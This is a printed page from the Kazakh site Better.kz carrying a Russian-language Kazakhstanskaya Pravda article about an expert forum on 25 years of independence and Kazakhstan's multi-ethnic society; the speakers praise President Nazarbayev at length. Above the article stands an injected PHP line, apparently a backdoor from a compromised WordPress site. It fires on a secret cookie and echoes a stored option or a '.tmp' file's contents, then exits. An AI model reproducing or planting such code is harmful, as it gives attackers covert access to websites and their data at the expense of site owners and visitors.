if (isset($_COOKIE["BsIbuVOYEiveJFkpFamX1AFEH3OK4xrKIKkWV0cFmaxChmhI"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); }
- Better.kz - http://better.kz/ -
Встреча экспертов и ученых состоялась в Национальной академической библиотеке. Тема: построение полиэтнического общества в Казахстане
Posted By Better On 21:29 In Глава, Маркер, Последние статьи | Comments Disabled
«Казахстанская правда»
Опыт Казахстана в построении полиэтнического общества и достижения республики за четверть века изучают эксперты и исследователи из разных стран. Этим вопросам был посвящен форум политологов и социологов «Республика Казахстан: 25 лет независимости. Результаты и перспективы».
Встреча экспертов и ученых состоялась в Национальной академической библиотеке. В ней приняли участие заместитель руководителя Администрации Президента РК Баглан Майлыбаев, представители государственных органов, неправительственных организаций, политологи и социологи из Германии, Италии, Китая и России.
Как отметил Баглан Майлыбаев, сегодня наша республика известна всему миру как страна активного созидания, избравшая собственный путь.
– За четверть века под руководством Лидера нации Нурсултана Назарбаева Казахстан прошел невероятно сложный путь достижений и успеха. Казахстан нашел единственно верный механизм сплочения народа на единой патриотической платформе – это мир, стабильность и согласие, – сказал заместитель руководителя Администрации Президента РК.
Об авторитете казахстанского Лидера говорил на форуме и посол МИД КНР Яо Пейшэн. Он напомнил, как в 1993 году по приглашению Председателя КНР Цзян Цзэминя состоялся первый визит в Китай Президента Нурсултана Назарбаева.
– Переговоры тогда прошли успешно, – вспоминал дипломат. – После завершения визита Цзян Цзэминь собрал всех работников МИДа, участвовавших в организации мероприятий, и сказал: «Президент Нурсултан Назарбаев – не рядовой политик. Мы обсудили многие вопросы, и хочу отметить, что он очень хорошо знаком с региональной и международной ситуацией. Нурсултан Назарбаев поделился со мной концепцией государственного управления. Казахстан – наш великий сосед, нам нужно следить за процессом внутреннего развития этой страны, мы непременно должны развивать дружеские отношения с таким лидером».
Особое внимание Яо Пейшэн уделил вопросам уникальной казахстанской модели построения полиэтнического и поликонфессионального общества на принципах взаимоуважения, толерантности и согласия.
– Если посмотрим на страны, которые в одно время с Казахстаном приобрели независимость, несложно заметить следующую картину: одни идут впереди по темпам развития, кто-то следует за ними, кто-то еще находится в тумане, а кто-то страдает от внутренних противоречий, – обозначил свое видение посол. – И в этом контексте Казахстан за 25 лет, за такое короткое время, успел добиться колоссальных успехов.
По словам спикера, Казахстан превратился из страны-получателя помощи в страну-донора. Наша республика предоставляла помощь государствам – членам ООН, выделяла средства на обучение студентов из Афганистана и оказывала другие меры поддержки этой и многим другим странам.
– Модель развития Казахстана считается успешной и вызывает большой интерес в разных странах, и в частности в Китае, – добавил Яо Пейшэн. – Интересен секрет успеха Казахстана. Первоначальные условия, такие как богатые природные ресурсы, разумеется, являются одним из факторов. Но и другие страны также имели подобные условия на старте, однако с ними сложилась иная ситуация. Есть одна старинная мудрость: «Дело не в дарах неба, а в уме правителя».
Как подчеркнул посол, в достижениях Казахстана большая заслуга Президента Нурсултана
Назарбаева как зрелого политика и стратега, умеющего принимать решения, основываясь на видении общей ситуации.
– Президент Казахстана сделал ставку на внутреннюю стабильность, и именно стабильность в конечном итоге гарантирует реализацию намеченных целей, – считает дипломат. – Казахстанский Лидер умеет выбирать рецепты для построения демократии. Исследуя зарубежный опыт, он хорошо понимает, что подойдет, а что – нет, выстраивая собственный уникальный путь развития.
Как отметил посол, Казахстан – это великий сосед, а Президент – великий кормчий.
Участники встречи говорили и о деловых качествах Президента, его способности принимать выверенные решения, отвечать на вызовы и кризисы практическими делами. Благодаря этому Казахстан завоевал высокий авторитет в мире, и доказательством этому является избрание нашей страны непостоянным членом Совета Безопасности ООН на 2017–2018 годы.
Ценность казахстанской модели построения полиэтнического общества подчеркнул президент Казахстанско-немецкого университета доктор социологических наук Маркус Кайзер.
– С европейской точки зрения Казахстан представляет собой модель успешного развития межнационального согласия, и большая заслуга в этом принадлежит Нурсултану Назарбаеву, – считает ученый. – Если сравнить ситуацию в вашей республике и в ряде других постсоветских стран, можно понять, чем отличается казахстанский подход и в чем заключается успешность вашей модели, которая позволяет Казахстану быть впереди.
Он также обратил внимание на ту важную роль, которую играет Ассамблея народа Казахстана в формировании атмосферы взаимного уважения, взаимообогащения культур, мира и согласия в многонациональной стране.
В свою очередь руководитель Центра по изучению межэтнических и межконфессиональных отношений в Центрально-Азиатском регионе Академии государственного управления при Президенте РК Айгуль Садвокасова сделала акцент на опыте формирования казахстанской идентичности, основанной на принципах гражданства.
По ее словам, казахстанская идентичность – это своеобразный индикатор гражданского состояния, то, без чего не может быть сформировано самосознание патриотов, независимо от этнического происхождения и вероисповедания.
– Это один из факторов, определяющих историческое развитие Казахстана как единой территории, традиционно населенной разными этносами. Этот феномен достоин изучения и распространения, – сделала вывод Айгуль Садвокасова.
Кроме того, в своем выступлении она обратила внимание на то, что укреплению базовых основ государственности, определению внутренней и внешней политики государства, выработке стратегических целей способствовало проведение последовательных реформ в сфере государственного строительства.
В то время как политологи со стажем анализировали глобальные вопросы, молодые ученые предпочли сосредоточиться на деталях и конкретике. Главный эксперт социологического отдела Института евразийской интеграции Адиль Родионов представил исследование, посвященное такому понятию, как труд в мировой экономике.
– Проблема развития многих государств в том, что труд в политических программах перестал быть основной силой, которая двигает вперед страну, – подчеркнул спикер. – Если эту ситуацию обратить, то страна станет на путь долгосрочного стабильного роста.
Он обратил внимание на программную статью Президента «20 шагов к Обществу Всеобщего Труда». Кроме того, ученый отметил, что и в Посланиях Президента, и в других стратегических документах, определяющих развитие Казахстана, красной нитью проходит повышение роли и значимости труда.
Участники форума провели обстоятельный анализ всех этапов развития Казахстана и итогов, достигнутых к 25-летию независимости. В ходе дискуссии были даны оценки пройденного пути, обозначены перспективы. Политологи и социологи выразили мнение о необходимости активизации проведения фундаментальных научных исследований и практического экспертного анализа развития страны.
Article printed from Better.kz: http://better.kz/
URL to article: http://better.kz/20161024/russkij-vstrecha-ekspertov-i-uchenyx-sos%c2%adtoyalas-v-nacionalnoj-akademicheskoj-biblioteke-tema-postroenie-polietnicheskogo-obshhestva-v-kazaxstane/
URLs in this post:
Click here to print.
© 2009 Better.kz. При копировании материалов ссылка на источник обязательна.